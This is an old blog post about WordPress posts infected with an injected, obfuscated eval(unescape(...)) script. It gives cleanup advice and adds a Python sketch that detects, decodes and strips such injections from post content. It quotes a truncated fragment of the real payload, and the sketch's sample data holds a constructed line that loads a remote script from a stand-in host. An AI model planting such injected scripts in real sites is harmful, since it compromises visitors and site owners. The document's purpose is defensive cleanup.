Mar 17 2011

WordPress database hacked? What to do?

Category: Wordpress Blogs

Answer:

Two of our WordPress blogs were hacked last night. I’m assuming many of you had the same. This hack was a little bit unusual though. After a hack we will typically back up our database and do a clean re-install. Newer WordPress versions allow automatic installs/updates right from the dashboard (very nice). We then checked all of the theme files to verify if any malicious code was injected. Nothing was found. We then noticed something strange, something we had not seen before. The pages and posts were the problem. Every page and post had a script injected. What A**holes!!! It was basically this (see below), with script tags around it:

eval(unescape(“%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B”.. ….

Here is a quick fix for this problem: a WordPress plugin called Search and Replace. It is a very easy-to-use plugin that allows you to search for and replace anything within the tables of your database. We found this to be much easier than accessing the database directly and performing a MySQL update query.
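The same cleanup can be checked offline against a database export before anything is changed on the live site. The sketch below is an added example, not code from the original post or from the plugin: it finds script blocks of the eval(unescape("%..")) shape in post bodies, decodes the payload for inspection without running it, and returns the cleaned content. The function names, the sample rows and the example.invalid URL are constructed for illustration.

```python
import re
from urllib.parse import unquote

# A <script> element whose whole body is eval(unescape("...")) with a
# percent-encoded argument: the shape of the injection described above.
INJECTED = re.compile(r"""
    <script[^>]*>\s*
    eval\(\s*unescape\(\s*
    ["'\u201c]((?:%[0-9A-Fa-f]{2})+)["'\u201d]
    \s*\)\s*\)\s*;?\s*
    </script>
""", re.IGNORECASE | re.VERBOSE)

def decode_payload(encoded):
    """Decode for triage only; JavaScript unescape() maps %XX to Latin-1."""
    return unquote(encoded, encoding="latin-1")

def clean_post(content):
    """Return (cleaned_content, decoded_payloads) for one post body."""
    found = [decode_payload(m.group(1)) for m in INJECTED.finditer(content)]
    return INJECTED.sub("", content), found

def scan_posts(rows):
    """rows: (post_id, post_content) pairs. Report infected rows only."""
    report = {}
    for post_id, content in rows:
        cleaned, payloads = clean_post(content)
        if payloads:
            report[post_id] = (cleaned, payloads)
    return report

# Constructed sample data (not the real payload, which the post truncates).
SAMPLE_JS = "document.write('<script src=\"http://example.invalid/x.php?kk=33\"></script>');"
SAMPLE_ENCODED = "".join("%%%02X" % b for b in SAMPLE_JS.encode("latin-1"))
SAMPLE_ROWS = [
    (1, "<p>Hello world</p>"),
    (2, '<p>Post body</p><script>eval(unescape("' + SAMPLE_ENCODED + '"));</script>'),
    (3, '<p>Map</p><script src="/js/map.js"></script>'),  # legitimate script
]

if __name__ == "__main__":
    for post_id, (cleaned, payloads) in scan_posts(SAMPLE_ROWS).items():
        print(post_id, payloads, "->", cleaned)
```

In a default install the rows would come from the post_content column of the wp_posts table. The decoded payload shows which remote script the injection was loading, which is worth recording before the rows are cleaned.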

This was just a quick fix. To secure your WordPress blog fully, so this doesn’t happen again, check out the official WordPress.org site. There is some excellent information on hardening the security of your WordPress blog. The video below also has some excellent tips.

